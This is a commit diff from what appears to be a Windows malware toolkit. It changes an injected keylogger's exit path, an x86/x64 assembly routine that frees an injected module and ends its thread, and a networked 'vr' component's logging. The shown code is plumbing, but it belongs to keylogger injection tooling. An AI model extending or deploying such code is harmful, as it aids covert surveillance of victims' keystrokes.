Use custom exit code with self-freeing modules and add some logging.

rokups · Feb 2, 2020 · ae91b09 · ae91b09
1 parent 59a415c
commit ae91b09
Show file tree

Hide file tree

Showing 5 changed files with 13 additions and 6 deletions.
diff --git a/src/keylogger/keylogger.cpp b/src/keylogger/keylogger.cpp
@@ -341,6 +341,8 @@ int main(HMODULE hModule)
     if (hMutex == NULL)
     {
         LOG_ERROR("Process %d already has keylogger injected", GetCurrentProcessId());
+        free_module_exit_thread(hModule, 1);
+        LOG_CRITICAL("This should never execute!");
         return 1;
     }
     context ctx{};
@@ -442,7 +444,7 @@ int main(HMODULE hModule)
     UnregisterClass(class_name, window_class.hInstance);
     ReleaseMutex(hMutex);
     CloseHandle(hMutex);
-    free_module_exit_thread(hModule);
+    free_module_exit_thread(hModule, 0);
     LOG_CRITICAL("This should never execute!");
     return 0;
 }

diff --git a/src/shared/free_exit.asm b/src/shared/free_exit.asm
@@ -33,7 +33,7 @@ public free_module_exit_thread
 
 free_module_exit_thread:
     sub  rsp, 20h
-    push 0                          ; thread exit code
+    push rdx                        ; thread exit code
     push 0C000h                     ; MEM_RELEASE | MEM_DECOMMIT
     push 0                          ; size
     push rcx                        ; module

diff --git a/src/shared/win32.cpp b/src/shared/win32.cpp
@@ -56,11 +56,11 @@ stl::string from_wstring(const wchar_t* str)
 }
 
 #ifndef _WIN64
-extern "C" void free_module_exit_thread(HMODULE hModule)
+extern "C" void free_module_exit_thread(HMODULE hModule, int exit_code)
 {
     __asm
     {
-        push 0                          ; thread exit code
+        push exit_code                  ; thread exit code
         push 0C000h                     ; MEM_RELEASE | MEM_DECOMMIT
         push 0                          ; size
         push hModule                    ; module

diff --git a/src/shared/win32.h b/src/shared/win32.h
@@ -29,4 +29,4 @@
 stl::string GetFolderPath(unsigned id);
 stl::vector<wchar_t> to_wstring(const stl::string& str);
 stl::string from_wstring(const wchar_t* str);
-extern "C" void free_module_exit_thread(HMODULE hModule);
+extern "C" void free_module_exit_thread(HMODULE hModule, int exit_code);
diff --git a/src/vr/main.cpp b/src/vr/main.cpp
@@ -42,8 +42,12 @@ INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine,
 
     HANDLE hMutex = mutex_lock(vr_mutant_main);
     if (!hMutex)
-        // Already running.
+    {
+        LOG_DEBUG("VR already running.");
         return 0;
+    }
+
+    LOG_DEBUG("VR runs as process %d", GetCurrentProcessId());
 
     WSADATA wsa{};
     WSAStartup(0x0202, &wsa);
@@ -60,6 +64,7 @@ INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine,
     WSACleanup();
     ReleaseMutex(hMutex);
     CloseHandle(hMutex);
+    LOG_DEBUG("VR exits.");
     return 0;
 }